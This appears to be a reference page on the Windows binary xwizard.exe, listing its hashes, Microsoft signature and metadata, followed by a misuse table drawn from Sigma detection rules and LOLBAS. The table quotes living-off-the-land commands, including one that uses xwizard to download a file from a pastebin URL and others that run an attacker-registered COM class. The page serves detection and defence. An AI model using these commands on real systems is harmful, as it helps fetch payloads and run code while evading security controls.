xwizard.exe
- File Path:
C:\Windows\system32\xwizard.exe - Description: Extensible Wizards Host Process
Hashes
| Type | Hash |
|---|---|
| MD5 | C0CCC55F9E988ACB8B624EFD0EC8B92B |
| SHA1 | ADEBEE7795F504746F5A565B94A4407783C02EA8 |
| SHA256 | AEA9116467138FDE0FDE0FD50C61EF1258B551AE1B64B2DF6BBCCE11467DF41C |
| SHA384 | E227C1168E3D090E871C260BB14028FB675DFC258E8F7F7934B3F2874B6F9DBDA8A60D2C91A81EB7903895FEC8BFB27A |
| SHA512 | 9480415021EF8841B9E1EC587399F5564C7F1AED73C93B5BB8DAA4B12270C5E1FC07D62D4B482E172549C5AC371518C5B7570871C3E0C40E1865242A2C6B338D |
| SSDEEP | 1536:khXUw9qLxeqI2GXaUzudDogp8URDoq4OZZZLlCIib:kBUlxeCeu6cdRD68wb |
Signature
- Status: Signature verified.
- Serial:
33000000BCE120FDD27CC8EE930000000000BC - Thumbprint:
E85459B23C232DB3CB94C7A56D47678F58E8E51E - Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: xwizard.exe.mui
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.14393.0 (rs1_release.160715-1616)
- Product Version: 10.0.14393.0
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
File Similarity (ssdeep match)
Possible Misuse
The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | proc_creation_win_class_exec_xwizard.yml | title: Custom Class Execution via Xwizard |
DRL 1.0 |
| sigma | proc_creation_win_class_exec_xwizard.yml | description: Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties. |
DRL 1.0 |
| sigma | proc_creation_win_class_exec_xwizard.yml | - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ |
DRL 1.0 |
| sigma | proc_creation_win_class_exec_xwizard.yml | Image\|endswith: '\xwizard.exe' |
DRL 1.0 |
| sigma | proc_creation_win_dll_sideload_xwizard.yml | title: Xwizard DLL Sideloading |
DRL 1.0 |
| sigma | proc_creation_win_dll_sideload_xwizard.yml | description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll |
DRL 1.0 |
| sigma | proc_creation_win_dll_sideload_xwizard.yml | - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ |
DRL 1.0 |
| sigma | proc_creation_win_dll_sideload_xwizard.yml | Image\|endswith: '\xwizard.exe' |
DRL 1.0 |
| LOLBAS | Xwizard.yml | Name: Xwizard.exe |
|
| LOLBAS | Xwizard.yml | - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} |
|
| LOLBAS | Xwizard.yml | Description: Xwizard.exe running a custom class that has been added to the registry. |
|
| LOLBAS | Xwizard.yml | - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} |
|
| LOLBAS | Xwizard.yml | Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. |
|
| LOLBAS | Xwizard.yml | - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM |
|
| LOLBAS | Xwizard.yml | Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file. |
|
| LOLBAS | Xwizard.yml | - Path: C:\Windows\System32\xwizard.exe |
|
| LOLBAS | Xwizard.yml | - Path: C:\Windows\SysWOW64\xwizard.exe |
MIT License. Copyright (c) 2020-2021 Strontic.